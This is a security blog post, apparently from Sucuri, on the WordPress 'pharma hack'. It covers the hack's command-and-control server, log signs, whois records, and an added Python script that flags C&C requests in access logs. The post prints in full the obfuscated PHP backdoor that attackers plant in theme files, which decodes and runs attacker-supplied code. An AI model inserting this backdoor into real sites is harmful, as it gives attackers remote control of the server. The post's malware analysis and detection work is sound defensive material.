Pharma hack and their C&C (Command & control) server

A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack:

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).

If your site has been affected, you can double-check your access.log for entries like these:

94.76.241.4 - - [31/Jul/2010:06:07:59 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 374 "-" "-"
94.76.241.4 - - [31/Jul/2010:06:08:30 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 447 "-" "-"
94.76.241.4 - - [31/Jul/2010:11:06:55 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 444 "-" "-"
94.76.241.4 - - [30/Jul/2010:12:57:41 -0700] "POST /wp-content/themes/classic/comments.php HTTP/1.1" 200 202 "-" "-"
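A log check that automates the access.log inspection above, added here as an example and not part of the original post. It assumes the Apache/nginx combined log format, uses the C&C address and the four entries quoted above as a constructed sample, and adds one made-up ordinary visitor (203.0.113.7) to show what is not flagged.

```python
import re
from typing import Iterable

# Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# The C&C address named in the post; add any others your own logs establish.
KNOWN_C2 = {"94.76.241.4"}
# The backdoor is dropped into theme files and later into the plugins directory.
DROP_DIR_RE = re.compile(r"^/wp-content/(themes|plugins)/[^?]*\.php$")

def flag_c2_requests(lines: Iterable[str], c2_ips=KNOWN_C2) -> list:
    """Return one finding per log line that looks like traffic to the backdoor."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                      # not a combined-format line; skip, don't guess
        ip, method, path = m["ip"], m["method"], m["path"]
        reasons = []
        if ip in c2_ips:
            reasons.append("request from known C&C address")
        if method == "POST" and DROP_DIR_RE.match(path):
            reasons.append("POST to a theme/plugin PHP file")
        if m["referer"] == "-" and m["ua"] == "-":
            reasons.append("empty referer and user-agent")
        # A known C&C address is enough on its own; otherwise require two signals,
        # since a lone empty user-agent or a lone theme POST has benign explanations.
        if ip in c2_ips or len(reasons) >= 2:
            findings.append({"ip": ip, "time": m["ts"], "path": path,
                             "status": int(m["status"]), "reasons": reasons})
    return findings

# Constructed sample: the four entries quoted in the post plus one ordinary page view.
SAMPLE_LOG = """\
94.76.241.4 - - [31/Jul/2010:06:07:59 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 374 "-" "-"
94.76.241.4 - - [31/Jul/2010:06:08:30 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 447 "-" "-"
94.76.241.4 - - [31/Jul/2010:11:06:55 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 444 "-" "-"
94.76.241.4 - - [30/Jul/2010:12:57:41 -0700] "POST /wp-content/themes/classic/comments.php HTTP/1.1" 200 202 "-" "-"
203.0.113.7 - - [31/Jul/2010:12:00:00 -0700] "GET /2010/07/hello-world/ HTTP/1.1" 200 8123 "http://example.net/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in flag_c2_requests(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["time"], f["path"], f["status"], "; ".join(f["reasons"]))
```

Feed it the real file with `flag_c2_requests(open("access.log"))`; the 500 responses on the sidebar.php hits are themselves a hint that the dropped file is erroring, not that the server refused the request.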

This IP is hosted at Blueconnex and, even after tons of abuse reports (from multiple sources), they've sat idle.

$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550

$ whois curingin.com
Registrant:
Icarus Kann Team
Icarus Kann (ikaruskann@ymail.com)
Potokaki
Elounda
Samos,81300
GR
Tel. +210.9882728

Requests from the IP address try to access a backdoor they’ve inserted inside the /themes directory (generally sidebar.php, comments.php, 404.php, etc). This is what the backdoor looks like (all in one line):

<?php $a = 'm'.'d5';
if($a($_REQUEST[$a])=='698357e86842'.'1222bcf89349bd5cf34d')
{$w = 'Cdbl0sYoWOiyJt3qtqyOoqxA';$x = $_REQUEST[$w];
$y = 'base'.'6';$y.= '4_d'.'ecode';$x = $y($x);$z = 'creat'.'e_f';
$z.= 'unction';$x = $z('',$x);$x();} ?>

If your site is hacked and it keeps getting reinfected, look for this backdoor.

Once that file is called, it re-uploads another script into the /plugins directory and inserts new entries in the DB. Our friend W. Andrew Loe III did a good analysis of this attack and found how it works in detail (he was able to decode all the files in his honeypot).

That’s the first file the attackers uploaded to hack everything:
http://sucuri.net/?page=tools&title=blacklist&detail=7b1341a148b1d8a205587218f66ef912

You see that it reads wp-config.php, creates a new plugin and activates it. This is the file added to the plugins:
http://sucuri.net/?page=tools&title=blacklist&detail=a9663c48164df1fcc59253aed5a0defc

This one is executed as well:
http://sucuri.net/?page=tools&title=blacklist&detail=eb5db5a81632a089fd07fa259c0448a6

This is a very interesting and complex attack they've managed to pull off. Many sites are still infected, so they probably have a large number of sites under their control.


If your site is infected and you need help, contact us. We’ll get your site cleaned up and malware-free right away.

Protect your interwebs!

13 comments
  1. So you are saying they've distributed free themes with a backdoor built in?

    Sneaky, clever and very dangerous.

    As with all plugins and themes that you upload (to any system) we should be scanning the code for anything that doesn't look right. But realistically… the vast majority of users don't and can't.

    I'd start with those encrypted footers. I understand why they are there… but as you've shown the backdoor isn't a big script, so script size isn't a danger indicator.

    1. Great comments Sarah, thanks!

      To clarify, it is in fact affecting themes, as well as plugins. There is no indication they've distributed exploited themes or plugins, although it is possible.

      Cheers,
      Dre

    1. Nathan, thanks for the comment. We're not posting anything not already publicly available. In fact, we've cleaned 100's of 1000's of sites infected with this specific exploit. Most of these sites are either indexed on Google with this garbage or easily found via complaints on Twitter.

      The idea here is to try and explain what is going on as we get more details. If we can get out (specifically to hosting providers) information which leads to killing this thing off, or at minimum slowing it down, then we're on the right track. For now, we'll continue posting relevant information as often as possible.

      Hope this helps.

      Dre

      1. Do you remember the CIH virus? http://en.wikipedia.org/wiki/CIH_%28computer_viru
        Its author was arrested in September 2000, but the virus source code leaked to the public. There were a lot of modifications of the virus even after three years! http://www.betanews.com/article/Chernobyl-Virus-A
        I think it's better not to publish the whole code, but the parts that can help people to identify it. You can provide the full source to authorized security professionals that may want to learn it.
        In my opinion, security professionals must be more responsible and not provide ready-to-use tools to the hacker community. There are not so many hardcore hackers, but hundreds of script kiddies and inexperienced hacker groups.
        I was hit by another type of pharma hack; it was relatively easy to clean. Their files were uploaded manually (by hand) using a c99 shell and the php file was included in my index.php.
        What I am afraid of… if there is more than one group that plays with the pharma hack, they will gain an immediate level-up after reading your article. So in a month we will get a lot of similar hacks on a modified codebase. Who will be responsible for that?

  2. Is the original source of this attack known? I’m cleaning up a client’s site, found all pieces of the puzzle that I’ve seen around the web, but want to make sure it doesn’t come back. Very very sneaky attack.
